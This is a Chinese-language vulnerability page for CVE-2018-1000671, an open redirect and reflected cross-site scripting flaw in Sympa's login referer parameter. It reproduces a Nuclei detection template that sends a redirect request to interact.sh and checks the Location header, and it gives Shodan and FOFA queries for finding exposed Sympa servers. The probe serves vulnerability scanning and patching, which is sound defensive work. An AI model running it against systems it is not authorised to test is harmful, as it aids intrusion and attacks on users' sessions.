CVE-2018-1000671: Sympa version =>6.2.16 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Sympa | POC: 已公开

漏洞描述

Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.

PoC代码[已公开]

id: CVE-2018-1000671

info:
  name: Sympa version =>6.2.16 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Sympa (>=6.2.17) or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/sympa-community/sympa/issues/268
    - https://vuldb.com/?id.123670
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671
    - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html
    - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-1000671
    cwe-id: CWE-601
    epss-score: 0.00883
    epss-percentile: 0.746
    cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sympa
    product: sympa
    shodan-query: http.html:"sympa"
    fofa-query: body="sympa"
  tags: cve,cve2018,redirect,sympa,debian

http:
  - method: GET
    path:
      - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4b0a00483046022100c6c342142e4002dc6871b17c2351f68fd8317aca2ca5594ef2bf574d57d320280221008c50f7269266ec8de9e6f00bc8608cb65ba3df60078d2f7dc21be7d4557a254c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-1000671.yaml